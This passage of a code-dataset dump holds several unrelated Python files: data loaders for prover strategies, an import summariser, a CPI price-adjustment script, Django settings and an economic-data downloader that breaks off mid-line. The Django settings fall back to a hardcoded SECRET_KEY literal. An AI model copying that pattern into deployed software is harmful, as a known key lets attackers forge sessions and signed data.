'T':\n sdict[sline[0]][0][sfile_i] = float(sline[2])\n return sdict\n\n def load_features(self, fdict, path=join(PATH, 'data/E/')):\n '''\n Loads the features file, parses it and adds them to the second\n list in the fdict\n\n Parameters\n ----------\n fdict : list\n List containing dictionaries in the shape of {key : [[],[]]}\n where the first list in the list contains strategy times and\n the second list will be filled with the features\n path : string\n Path to a folder which contains the features file\n\n returns\n -------\n fdict : list\n Same type and shape as the initial fdict parameter but with\n the second list in the value containing the parsed features\n '''\n ffile = 'pegasusFeatures'\n with open(path + ffile, 'r') as inputstream:\n firstline = True\n for line in inputstream:\n if firstline:\n firstline = False\n else:\n tmp = (line.strip()).split('#')\n key = tmp[0].split('/')[2]\n fdict[key][1] = [float(x) for x in tmp[1].split(',')]\n return fdict\n\n def generate_feature_matrix(self, fdict):\n '''\n Converts a list of dictionaries in the shape as the one generated by\n the 'load_features' and 'sat_load_features' functions and turns it\n into a N x M numpy array\n\n Parameters\n ----------\n fdict : list\n List of dictionaries containing all features for all problems as\n generated by the function 'load_features'\n\n Returns\n -------\n result : numpy array\n N x M array containing all features for all problems in the parameters\n '''\n total_features = []\n for key in fdict.keys():\n total_features.append(fdict[key][1])\n return np.array(total_features)\n\n def generate_strategy_matrix(self, sdict):\n '''\n Converts a list of dictionaries in the shape as the one generated by\n the 'load_strategies' function and turns it into a N x K numpy array\n\n Parameters\n ----------\n fdict : 
list\n List of dictionaries containing all strategy times for all problems as\n generated by the function 'load_strategies'\n\n Returns\n -------\n result : numpy array\n N x K array containing all strategy times for all problems in the parameters\n '''\n total_strategies = []\n for key in sdict.keys():\n total_strategies.append(sdict[key][0])\n return np.array(total_strategies)\n\n def sat_load_strat(self, filename, path=join(PATH, 'data/Satallax/results')):\n '''\n Loads a single Satallax strategy and puts it in a dictionary in the\n shape of {problem : time}\n\n Parameters\n ----------\n filename : string\n The name of the file containing the strategy data\n\n Returns\n -------\n new_strat : dictionary\n Contains all times for each solved problem, in the shape\n of {problem : time}\n '''\n new_strat = {}\n with open(join(path, filename), 'r') as inputstream:\n for line in inputstream:\n sline = line.split()\n new_strat[sline[0].split('/')[6]] = float(sline[1])\n return new_strat\n\n def sat_load_features(self):\n '''\n Loads and parses the feature names and actual features\n\n Returns\n -------\n Problems : 1 x N Numpy array\n Numpy array containing all problem names\n Features : N x M Numpy array\n Numpy array containing the actual features\n '''\n features_path = join(PATH, 'data', 'Satallax', 'Satallax_features')\n problems = []\n features = []\n with open(features_path, 'r') as f:\n for line in f:\n hashtag_split = line.split('#')\n problems.append(hashtag_split[0].split('/')[7])\n features.append(map(float, hashtag_split[1].replace('\\n', '').split(',')))\n return np.array(problems), np.array(features)\n\n def sat_generate_strat_matrix(self, probs, strat_dicts):\n '''\n Converts a list of dictionaries in the shape as the one generated by\n the 'sat_load_strat' function and turns it into a numpy array\n\n Parameters\n ----------\n probs : list\n List of all problem names\n strat_dicts : list\n Contains dictionaries as generated by 'sat_load_strat'\n\n Returns\n -------\n result : numpy array\n N x K array containing all strategy times for all problems in the parameters\n '''\n strategy_matrix = np.empty((len(probs), len(strat_dicts)))\n strategy_matrix[:] = -1\n index_dict = dict([index_item for index_item in zip(probs, range(len(probs)))])\n for col, strat in enumerate(strat_dicts):\n for prob in strat.keys():\n strategy_matrix[index_dict[prob], col] = strat[prob]\n return strategy_matrix\n\n def sat_get_strat_file_names(self, path=join(PATH, 'data/Satallax/results')):\n '''\n Collects and returns all relevant filenames for Satallax strategies in a certain path\n\n Parameters\n ----------\n path : string\n Path to a folder which should be checked for strategy file names\n\n Returns\n -------\n result : list\n A list of strings containing all relevant strategy file names\n '''\n return [f for f in listdir(path) if isfile(join(path, f))]\n","repo_name":"VanHElsing/VanHElsing","sub_path":"src/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":11714,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"9808471053","text":"\"\"\"Summarise Python imports in a given context.\n\"\"\"\n\nimport argparse\nimport ast\nimport distutils.sysconfig\nimport json\nimport os\nimport pkgutil\nimport sys\nfrom typing import Any, Dict, Generator, List, Optional, Set\n\n_TRANSLATE = {\n \"pkg_resources\": \"setuptools\",\n}\n\n\ndef iter_code_cells(cells: List[Dict[str, Any]]) -> Generator[str, None, None]:\n \"\"\"Iterate 
over cells in a Jupyter notebook, yielding source code from code cells.\"\"\"\n for cell in cells:\n if cell[\"cell_type\"] == \"code\":\n yield \"\".join(cell[\"source\"])\n\n\nclass ImportCollector(ast.NodeVisitor):\n def __init__(self, ignore: Optional[List[str]] = None):\n super().__init__()\n self.imports = set()\n self.ignore = set(ignore) if ignore else set()\n\n def _push_name(self, name: str):\n if name not in self.ignore:\n self.imports.add(_TRANSLATE.get(name, name))\n\n def visit_Import(self, node: ast.Import):\n for alias in node.names:\n name, *_ = alias.name.split(\".\")\n self._push_name(name)\n\n def visit_ImportFrom(self, node: ast.ImportFrom):\n if node.module is not None:\n name = node.module\n if \".\" in name:\n name, *_ = name.split(\".\")\n if node.level == 0:\n self._push_name(name)\n\n\ndef gather_modules(path: str):\n for mod in pkgutil.walk_packages([path]):\n yield mod\n if mod.ispkg:\n subpath = os.path.join(mod.module_finder.path, mod.name)\n for submod in gather_modules(subpath):\n yield submod\n\n\ndef get_stdlib() -> Set[str]:\n \"\"\"Get a list of module names that (probably) comprises the Python standard\n library.\n \"\"\"\n std = distutils.sysconfig.get_python_lib(standard_lib=True)\n stdlib = set(mod.name for mod in pkgutil.iter_modules([std]))\n stdlib.update(sys.builtin_module_names)\n return stdlib\n\n\ndef handle_package(path: str):\n stdlib = get_stdlib()\n collector = ImportCollector(ignore=[os.path.basename(path)])\n for mod in gather_modules(path):\n path = mod.module_finder.path\n if mod.ispkg:\n continue\n with open(os.path.join(path, f\"{mod.name}.py\"), \"r\") as f:\n mod_str = f.read()\n nodes = ast.parse(mod_str)\n collector.visit(nodes)\n\n final = collector.imports - stdlib\n for mod in sorted(final):\n print(mod)\n\n\ndef handle_notebook(path: str):\n \"\"\"Parse cells from a notebook, extracting imports.\"\"\"\n stdlib = get_stdlib()\n with open(path) as ipy_file:\n data = json.load(ipy_file)\n # TODO: check this is a python notebook\n # meta = data['metadata']\n collector = ImportCollector()\n for cell in iter_code_cells(data[\"cells\"]):\n nodes = ast.parse(cell)\n collector.visit(nodes)\n\n final = collector.imports - stdlib\n for mod in sorted(final):\n print(mod)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Print non-standard-library imports made in a package, module or Jupyter notebook\"\n )\n parser.add_argument(\"path\")\n args = parser.parse_args()\n\n path = os.path.abspath(os.path.expanduser(args.path))\n if os.path.isdir(path):\n handle_package(path)\n elif path.endswith(\".ipynb\"):\n handle_notebook(path)\n else:\n print(f\"Unrecognised path: {args.path}\")\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kthwaite/wimp","sub_path":"wimp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7473919684","text":"\n# import modules from other libraries\nfrom __future__ import print_function\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport requests\nimport logging\nimport tablib\nimport argparse \n\nCPI_DATA_URL = 'http://research.stlouisfed.org/fred2/data/CPIAUCSL.txt'\n\nclass CPIData(object): #Class\n\n\t\"\"\"Abstraction of the CPI data provided by FRED.\n This stores internally only one value per year.\n \"\"\"\n\n\tdef __init__(self): #Methods\n\t\tself.year_cpi = {}\n\t\tself.last_year = None\n\t\tself.first_year = 
None\n\n\tdef load_from_url (self, url, save_as_file = None):\n\t\t\"\"\"Loads data from a given url. After fetching the file this implementation uses load_from_file\n        internally.\n        \"\"\"\n\n\t\tfp = requests.get(url, stream = True, headers = {'Accept-Encoding': None}).raw\n\n\t\tif save_as_file is None:\n\t\t\treturn self.load_from_file(fp)\n\n\t\telse:\n\t\t\twith open(save_as_file, 'wb+') as out:\n\t\t\t\twhile True:\n\t\t\t\t\tbuffer = fp.read(81920)\n\t\t\t\t\tif not buffer:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tout.write(buffer)\n\t\t\twith open(save_as_file) as fp:\n\t\t\t\treturn self.load_from_file(fp)\n\n\tdef load_from_file (self, fp):\n\t\t\"\"\"Loads CPI data from a given file-like object.\n\t\t\"\"\"\n\n\t\tcurrent_year = None\n\t\tyear_cpi = []\n\t\treached_dataset = False\n\t\tfor line in fp:\n\t\t\t# Skip the header block; the data rows begin after the \"DATE \" line\n\t\t\tif not reached_dataset:\n\t\t\t\tif line.startswith(\"DATE \"):\n\t\t\t\t\treached_dataset = True\n\t\t\t\tcontinue\n\n\t\t\tdata = line.rstrip().split()\n\n\t\t\tyear = int(data[0].split(\"-\")[0])\n\t\t\tcpi = float(data[1])\n\n\t\t\tif self.first_year is None:\n\t\t\t\tself.first_year = year\n\n\t\t\tself.last_year = year\n\n\t\t\tif current_year != year:\n\t\t\t\tif current_year is not None:\n\t\t\t\t\tself.year_cpi[current_year] = sum(year_cpi) / len(year_cpi)\n\t\t\t\tyear_cpi = []\n\t\t\t\tcurrent_year = year\n\t\t\t\n\t\t\tyear_cpi.append(cpi)\n\n\t\tif current_year is not None and current_year not in self.year_cpi:\n\t\t\tself.year_cpi[current_year] = sum(year_cpi) / len(year_cpi)\n\n\tdef get_adjusted_price (self, price, year, current_year = None):\n\t\t\"\"\"Returns the price from a given year adjusted to the specified\n        current year.\n        This essentially is the calculated inflation for an item.\n        \"\"\"\n\n\t\tif current_year is None or current_year > 2013:\n\t\t\tcurrent_year = 2013\n\n\t\tif year < self.first_year:\n\t\t\tyear = self.first_year\n\t\telif year > self.last_year:\n\t\t\tyear = self.last_year\n\n\t\tyear_cpi = self.year_cpi[year]\n\t\tcurrent_cpi = self.year_cpi[current_year]\n\t\t\n\t\treturn float(price) / year_cpi * current_cpi\n\nclass GiantbombAPI(object):\n\t\"\"\"Simple client for the Giantbomb API that exposes the platform\n    listing as a generator.\n    \"\"\"\n\t\n\tbase_url = 'http://www.giantbomb.com/api/'\n\n\tdef __init__(self, api_key):\n\t\tself.api_key = api_key\n\n\tdef get_platforms(self, sort = None, filter = None, field_list = None):\n\t\t\"\"\"Generator yielding platforms matching the given criteria. If no\n        limit is specified, this will return *all* platforms.\n        \"\"\"\n\n\t\t# The following lines also do value-format conversions from what's\n        # common in Python (lists, dictionaries) into what the API requires.\n\t\tparams = {}\n\t\tif sort is not None:\n\t\t\tparams['sort'] = sort\n\t\tif field_list is not None:\n\t\t\tparams['field_list'] = ','.join(field_list)\n\t\tif filter is not None:\n\t\t\tparsed_filters = []\n\t\t\tfor key,value in filter.iteritems():\n\t\t\t\tparsed_filters.append('{0}:{1}'.format(key, value))\n\t\t\tparams['filter'] = ','.join(parsed_filters)\n\n\t\t# append API key to the list of parameters\n\t\tparams['api_key'] = self.api_key\n\t\tparams['format'] = 'json'\n\n\t\t# Giantbomb's limit for items in a result set for this API is 100\n        # items. But given that there are more than 100 platforms in their\n        # database we will have to fetch them in more than one call.\n\t\tincomplete_result = True\n\t\tnum_total_results = None\n\t\tnum_fetched_results = 0\n\t\tcounter = 0\n\n\t\twhile incomplete_result:\n\t\t\tparams['offset'] = num_fetched_results\n\t\t\tresult = requests.get(self.base_url + 'platforms', params = params)\n\t\t\tresult = result.json()\n\n\t\t\tif num_total_results is None:\n\t\t\t\tnum_total_results = int(result['number_of_total_results'])\n\t\t\tnum_fetched_results += int(result['number_of_page_results'])\n\t\t\tif num_fetched_results >= num_total_results:\n\t\t\t\tincomplete_result = False\n\t\t\tfor item in result['results']:\n\t\t\t\tlogging.debug(\"Yielding platform {0} of {1}\".format(counter + 1, num_total_results))\n\n\t\t\t\tif 'original_price' in item and item['original_price']:\n\t\t\t\t\titem['original_price'] = float(item['original_price'])\n\n\t\t\t\tyield item\n\t\t\t\tcounter += 1\n\n\ndef is_valid_dataset(platform): #Function\n\n\t\"\"\"Filters out datasets that we can't use since they are either lacking\n    a release date or an original price. For rendering the output we also\n    require the name and abbreviation of the platform.\n\n    \"\"\"\n\n\tif 'release_date' not in platform or not platform['release_date']:\n\t\tlogging.warn(u\"{0} has no release_date\".format(platform['name']))\n\t\treturn False\n\tif 'original_price' not in platform or not platform['original_price']:\n\t\tlogging.warn(u\"{0} has no original_price\".format(platform['name']))\n\t\treturn False\n\tif 'name' not in platform or not platform['name']:\n\t\tlogging.warn(u\"No platform name found for given dataset\")\n\t\treturn False\n\tif 'abbreviation' not in platform or not platform['abbreviation']:\n\t\tlogging.warn(u\"{0} has no abbreviation\".format(platform['name']))\n\t\treturn False\n\treturn True\n\n\ndef generate_plot(platforms, output_file): #Function\n\n\t\"\"\"Generates a bar chart out of the given platforms and writes the output\n    into the specified file as PNG image.\n    \"\"\"\n\n\tlabels = []\n\tvalues = []\n\n\tfor platform in platforms:\n\t\tname = platform['name']\n\t\tadjusted_price = platform['adjusted_price']\n\t\tprice = platform['original_price']\n\n\t\tif price > 2000:\n\t\t\tcontinue\n\n\t\tif len(name) > 15:\n\t\t\tname = platform['abbreviation']\n\t\tlabels.insert(0, u\"{0}\\n$ {1}\\n$ {2}\".format(\n\t\t\tname, price, round(adjusted_price, 2)))\n\t\tvalues.insert(0, adjusted_price)\n\n\twidth = 0.3\n\tind = np.arange(len(values))\n\tfig = plt.figure(figsize = (len(labels) * 1.8, 10))\n\n\tax = fig.add_subplot(1, 1, 1)\n\tax.bar(ind, values, width, align = 'center')\n\n\tplt.ylabel('adjusted_price')\n\tplt.xlabel('Year / Console')\n\tax.set_xticks(ind + 0.3)\n\tax.set_xticklabels(labels)\n\tfig.autofmt_xdate()\n\tplt.grid(True)\n\n\tplt.savefig(output_file, dpi = 72)\n\ndef generate_csv(platforms, output_file): #Function\n\t\n\t\"\"\"Writes the given platforms into a CSV file specified by the output_file\n    parameter.\n    \"\"\"\n\tdataset = tablib.Dataset(headers = ['Abbreviation', 'Name', 'Year', 'Price', 'Adjusted Price'])\n\n\tfor p in platforms:\n\t\tdataset.append([p['abbreviation'], p['name'], p['year'], p['original_price'], p['adjusted_price']])\n\n\t# If the output_file is a string it represents a path to a file which\n    # we will have to open first for writing. Otherwise we just assume that\n    # it is already a file-like object and write the data into it.\n \t\n\tif isinstance(output_file, basestring):\n\t\twith open(output_file, 'w+') as fp:\n\t\t\tfp.write(dataset.csv)\n\telse:\n\t\toutput_file.write(dataset.csv)\n\ndef parse_args(): #Function\n\t\n\t\"\"\"Parses the command line arguments of the script.\n\t\"\"\"\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--giantbomb-api-key', required = True, \n\t\t\t\t\t\thelp = 'API Key provided by Giantbomb.com')\n\tparser.add_argument('--cpi-file',\n\t\t\t\t\t\tdefault = os.path.join(os.path.dirname(__file__),\n\t\t\t\t\t\t\t\t\t\t\t'CPIAUCSL.txt'),\n\t\t\t\t\t\thelp = 'Path to file containing the CPI data')\n\tparser.add_argument('--cpi-data-url', default = CPI_DATA_URL,\n\t\t\t\t\t\thelp = 'URL which should be used as CPI data source')\n\tparser.add_argument('--debug', default = False, action = 'store_true',\n\t\t\t\t\t\thelp = 'debug')\n\tparser.add_argument('--csv-file', help = 'Path to CSV file for output')\n\tparser.add_argument('--plot-file', help = 'Path to PNG file for output')\n\tparser.add_argument('--limit', type = int, help = \"Number of recent platforms to be considered\")\n\topts = parser.parse_args()\n\n\tif not (opts.plot_file or opts.csv_file):\n\t\tparser.error(\"You have to specify either a --csv-file or --plot-file\")\n\treturn opts\n\ndef main():\n\n\t\"\"\"This function handles the logic of the script\"\"\"\n\n\topts = parse_args()\n\n\tif opts.debug:\n\t\tlogging.basicConfig(level = logging.DEBUG)\n\telse:\n\t\tlogging.basicConfig(level = logging.INFO)\n\n\tcpi_data = CPIData()\n\tgb_api = GiantbombAPI(opts.giantbomb_api_key)\n\n\tif os.path.exists(opts.cpi_file):\n\t\twith open(opts.cpi_file) as fp:\n\t\t\tcpi_data.load_from_file(fp)\n\telse:\n\t\tcpi_data.load_from_url(opts.cpi_data_url, save_as_file = opts.cpi_file)\n\n\tplatforms = []\n\tcounter = 0\n\n\tfor platform in gb_api.get_platforms(sort = 'release_date:desc',\n\t\t\t\t\t\t\t\t\t\tfield_list = ['release_date',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'original_price', 'name',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'abbreviation']):\n\t\tif not is_valid_dataset(platform):\n\t\t\tcontinue\n\n\t\tyear = int(platform['release_date'].split('-')[0])\n\t\tprice = platform['original_price']\n\t\tadjusted_price = cpi_data.get_adjusted_price(price,year)\n\t\tplatform['year'] = year\n\t\tplatform['original_price'] = price\n\t\tplatform['adjusted_price'] = adjusted_price\n\t\tplatforms.append(platform)\n\n\t\tif opts.limit is not None and counter + 1 >= opts.limit:\n\t\t\tbreak\n\t\tcounter += 1\n\n\tif opts.plot_file:\n\t\tgenerate_plot(platforms, opts.plot_file)\n\tif opts.csv_file:\n\t\tgenerate_csv(platforms, opts.csv_file)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"Stiefan/DataAnalysis","sub_path":"APIcalls/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"905017766","text":"\"\"\"\nDjango settings for table_tennis project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport dj_database_url\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for 
production\n# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/\n\nALLOWED_HOSTS = ['.herokuapp.com', ]\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'table_tennis',\n 'gunicorn',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates/'),\n)\n\nROOT_URLCONF = 'table_tennis.urls'\n\nWSGI_APPLICATION = 'table_tennis.wsgi.application'\n\n# Internationalization\n# https://docs.djangoproject.com/en/dev/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nDATE_FORMAT = 'd-m-Y'\n\nDATE_INPUT_FORMATS = (\n '%Y-%m-%d', '%d-%m-%Y', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '25-10-2006', '10/25/2006', '10/25/06'\n '%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'\n '%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'\n '%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'\n '%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'\n)\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/dev/howto/static-files/\n\nSECRET_KEY = os.environ.get('SECRET_KEY', '*-t&u2*@dg%nxr15)uno%8&=%8cxrw2z9xdk6##*t^0ti_7-$y')\n\nSTATIC_ROOT = 'staticfiles'\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nfrom django.contrib.messages import constants as message_constants\n\n\nMESSAGE_TAGS = {\n message_constants.INFO: '',\n message_constants.SUCCESS: 'uk-alert-success',\n message_constants.WARNING: 'uk-alert-warning',\n message_constants.ERROR: 'uk-alert-danger',\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'table_tennis',\n }\n}\n\n# DATABASES = {\n# 'default': {\n# 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n# 'NAME': 'table_tennis',\n# 'USER': 'postgres',\n# 'PASSWORD': 'asdasd',\n# 'HOST': 'localhost',\n# 'PORT': '5432',\n# }\n# }\n\nDATABASES['default'] = dj_database_url.config()\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n","repo_name":"wlansu/pl-table-tennis","sub_path":"table_tennis/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13301957922","text":"from urllib.request import urlopen\r\nimport matplotlib.pyplot as plt\r\nimport pandas\r\nimport quandl\r\nimport time\r\nimport datetime\r\n#from functools import reduce\r\n\r\ntime.sleep(60)\r\n\r\ndef add_one_month(t):\r\n \"\"\"Return a `datetime.date` or `datetime.datetime` (as given) that is\r\n one month earlier.\r\n\r\n Note that the resultant day of the month might change if the following\r\n month has fewer days:\r\n\r\n >>> add_one_month(datetime.date(2010, 1, 31))\r\n datetime.date(2010, 2, 28)\r\n \"\"\"\r\n import datetime\r\n one_day = datetime.timedelta(days=1)\r\n one_month_later = t + one_day\r\n while one_month_later.month == t.month: # 
advance to start of next month\r\n one_month_later += one_day\r\n target_month = one_month_later.month\r\n while one_month_later.day < t.day: # advance to appropriate day\r\n one_month_later += one_day\r\n if one_month_later.month != target_month: # gone too far\r\n one_month_later -= one_day\r\n break\r\n return one_month_later\r\n\r\n\r\n\r\n#https://www.quandl.com/data/FRED/GDP-Gross-Domestic-Product (QUARTERLY) (GDP)\r\n#GDP\r\n#gdpdata = quandl.get(\"FRED/GDP\", start_date=\"2001-12-31\", end_date=\"2005-12-31\")\r\ngdpdata = quandl.get(\"FRED/GDP\")\r\nprint(type(gdpdata))\r\nprint(gdpdata.shape)\r\nprint(gdpdata.head())\r\n\r\n#C:\\Users\\vivekm\\PycharmProjects\\tests1\r\ngdpdata.to_csv(\"inputgdpdata\", sep=\",\", header=False)\r\n\r\nfilename = 'inputgdpdata'\r\nlist = []\r\nl = []\r\nnewlist = []\r\nf = open(\"newgdp.csv\", 'w')\r\nfile = open(filename, 'r')\r\n\r\nfor line in file:\r\n line = line.strip('\\n')\r\n\r\n l.append(line)\r\n\r\nfor i in l:\r\n list.append(i)\r\nlength = len(list)\r\n\r\nnewlist.append(list[0])\r\n\r\nfor i in range(0,length-1):\r\n vnextitem = (list[i+1].split(\",\"))\r\n vcurrentitem = (list[i].split(\",\"))\r\n\r\n diff = float(vnextitem[1]) - float(vcurrentitem[1])\r\n a = diff / 3.0\r\n b = float(vcurrentitem[1]) + a\r\n c = float(vcurrentitem[1]) + 2*a\r\n\r\n mydate=datetime.datetime.strptime(vcurrentitem[0], '%Y-%m-%d').date()\r\n x=add_one_month(mydate)\r\n y=add_one_month(x)\r\n\r\n newlist.append(x.strftime('%Y-%m-%d')+\",\"+str(b))\r\n newlist.append(y.strftime('%Y-%m-%d') + \",\" + str(c))\r\n newlist.append(list[i+1])\r\n i = i+1\r\n\r\nfor i in newlist:\r\n f.writelines(str(i)+\"\\n\")\r\nfingdpdata = pandas.read_csv(\"newgdp.csv\",names=['Date','gdp'])\r\nprint(type(fingdpdata))\r\nprint(fingdpdata.head())\r\nprint(fingdpdata.shape)\r\n\r\n#plt.xlabel('Year')\r\n#plt.xlabel('Date')\r\n#plt.ylabel('Value')\r\n#plt.legend().set_visible(False)\r\n#plt.show()\r\n#ndf = fingdpdata.merge(finulcbsdata,on='date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/FRED/ULCBS-Business-Sector-Unit-Labor-Cost Employment Cost Index (QUARTERLY) (UNL)\r\nulcbsdata = quandl.get(\"FRED/ULCBS\")\r\nprint(type(ulcbsdata))\r\nprint(ulcbsdata.head())\r\nprint(ulcbsdata.shape)\r\n\r\nulcbsdata.to_csv(\"inputuldata\", sep=\",\", header=False)\r\n\r\nfilename = 'inputuldata'\r\nlist = []\r\nl = []\r\nnewlist = []\r\nf = open(\"newul.csv\", 'w')\r\nfile = open(filename, 'r')\r\n\r\nfor line in file:\r\n line = line.strip('\\n')\r\n l.append(line)\r\n\r\nfor i in l:\r\n list.append(i)\r\nlength = len(list)\r\n\r\nnewlist.append(list[0])\r\n\r\nfor i in range(0,length-1):\r\n vnextitem = (list[i+1].split(\",\"))\r\n vcurrentitem = (list[i].split(\",\"))\r\n\r\n diff = float(vnextitem[1]) - float(vcurrentitem[1])\r\n a = diff / 3.0\r\n b = float(vcurrentitem[1]) + a\r\n c = float(vcurrentitem[1]) + 2*a\r\n\r\n mydate=datetime.datetime.strptime(vcurrentitem[0], '%Y-%m-%d').date()\r\n x=add_one_month(mydate)\r\n y=add_one_month(x)\r\n\r\n #newlist.append(list[i])\r\n newlist.append(x.strftime('%Y-%m-%d')+\",\"+str(b))\r\n newlist.append(y.strftime('%Y-%m-%d') + \",\" + str(c))\r\n newlist.append(list[i+1])\r\n i = i+1\r\n\r\nfor i in newlist:\r\n f.writelines(str(i)+\"\\n\")\r\nfinulcbsdata = pandas.read_csv(\"newul.csv\",names=['Date','ulc'])\r\nprint(type(finulcbsdata))\r\nprint(finulcbsdata.head())\r\nprint(finulcbsdata.shape)\r\n\r\ndf1 = 
fingdpdata.merge(finulcbsdata,on='Date')\r\ntime.sleep(60)\r\n\r\n\r\n#https://fred.stlouisfed.org/series/INTDSRUSM193N#0 Interest Rate (IR)\r\nurlint = \"https://fred.stlouisfed.org/graph/fredgraph.csv?chart_type=line&recession_bars=on&log_scales=&bgcolor=%23e1e9f0&graph_bgcolor=%23ffffff&fo=Open+Sans&ts=12&tts=12&txtcolor=%23444444&show_legend=yes&show_axis_titles=yes&drp=0&cosd=1950-01-01&coed=2017-04-01&height=450&stacking=&range=&mode=fred&id=INTDSRUSM193N&transformation=lin&nd=1950-01-01&ost=-99999&oet=99999&lsv=&lev=&mma=0&fml=a&fgst=lin&fgsnd=2009-06-01&fq=Monthly&fam=avg&vintage_date=&revision_date=&line_color=%234572a7&line_style=solid&lw=2&scale=left&mark_type=none&mw=2&width=1168\"\r\nintcsv = urlopen(urlint)\r\nintdata = pandas.read_csv(intcsv, index_col=0, parse_dates=True)\r\nfinintdata = intdata.reset_index()\r\nfinintdata1 = finintdata.rename(columns={\"INTDSRUSM193N\": \"ir\", \"DATE\" : \"Date\"})\r\nprint(finintdata1.head())\r\n\r\n\r\ndf2 = df1.merge(finintdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/FRED/CPIAUCSL-Consumer-Price-Index-for-All-Urban-Consumers-All-Items (CPI)\r\ncpidata = quandl.get(\"FRED/CPIAUCSL\")\r\nfincpidata = cpidata.reset_index()\r\nfincpidata1 = fincpidata.rename(columns={\"Value\": \"cpi\"})\r\nprint(fincpidata1.head())\r\n#dfs = [gdpdata, cpidata]\r\n#df_final = reduce(lambda left,right: pd.merge(left,right,on='Date'), dfs)\r\n#print(df_final.head())\r\n\r\n#ndf = df1.merge(df2,on='Date').merge(df3,on='Date')\r\n#ndf = df1.merge(df2,on='Date')\r\n#print(type(ndf))\r\n#print(ndf.head())\r\n#print(ndf.shape)\r\n\r\ndf3 = df2.merge(fincpidata1,on='Date')\r\ntime.sleep(60)\r\n\r\n\r\n\r\n#https://www.quandl.com/data/FRED/HSN1F-New-One-Family-Houses-Sold-United-States (NHS)\r\n#New Home Sales (NHS)\r\nnhsdata = quandl.get(\"FRED/HSN1F\")\r\nfinnhsdata = nhsdata.reset_index()\r\nfinnhsdata1 = finnhsdata.rename(columns={\"Value\": \"nhs\"})\r\nprint(finnhsdata1.head())\r\n\r\ndf4 = df3.merge(finnhsdata1,on='Date')\r\ntime.sleep(60)\r\n#https://www.quandl.com/data/FRED/TCU-Capacity-Utilization-Total-Industry Capacity Utilization (CU)\r\ntcudata= quandl.get(\"FRED/TCU\")\r\nfintcudata = tcudata.reset_index()\r\nfintcudata1 = fintcudata.rename(columns={\"Value\": \"cu\"})\r\nprint(fintcudata1.head())\r\n\r\ndf5 = df4.merge(fintcudata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.census.gov/retail/marts/historic_releases.html Retail Sales (RS)\r\nrsafsdata= quandl.get(\"FRED/RSAFS\")\r\nfinrsafsdata = rsafsdata.reset_index()\r\nfinrsafsdata1 = finrsafsdata.rename(columns={\"Value\": \"rs\"})\r\nprint(finrsafsdata1.head())\r\n\r\ndf6 = df5.merge(finrsafsdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/ISM/MAN_PMI-PMI-Composite-Index NAPM Index (NAPM)\r\npmidata = quandl.get(\"ISM/MAN_PMI\")\r\nfinpmidata = pmidata.reset_index()\r\nfinpmidata1 = finpmidata.rename(columns={\"Value\": \"napm\"})\r\nprint(finpmidata1.head())\r\n\r\n\r\n\r\ndf7 = df6.merge(finpmidata1,on='Date')\r\ntime.sleep(60)\r\n#https://www.quandl.com/data/FRED/PAYEMS-All-Employees-Total-Nonfarm-Payrolls (NFP)\r\n#Non Farm Payrolls\r\nnfpdata = quandl.get(\"FRED/PAYEMS\")\r\nfinnfpdata = 